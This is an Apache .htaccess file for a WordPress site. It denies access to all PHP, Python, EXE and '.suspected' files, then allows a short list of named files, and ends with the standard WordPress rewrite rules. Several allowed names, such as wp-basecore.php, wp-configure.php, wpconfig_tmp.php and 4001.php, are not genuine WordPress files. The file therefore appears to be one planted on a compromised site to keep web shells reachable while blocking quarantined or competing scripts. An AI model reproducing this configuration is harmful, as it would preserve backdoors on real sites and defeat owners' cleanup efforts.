<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(index.php|wp-login.php|wp_cron.php|wp-login.php|wp-load.php|wp-links.php|wp-updates.php|wp-themes.php|wp-files.php|wp-basecore.php|wp-content.php|wp-includes.php|wp-settings.php|wp-configure.php|wpconfig_tmp.php|4001.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>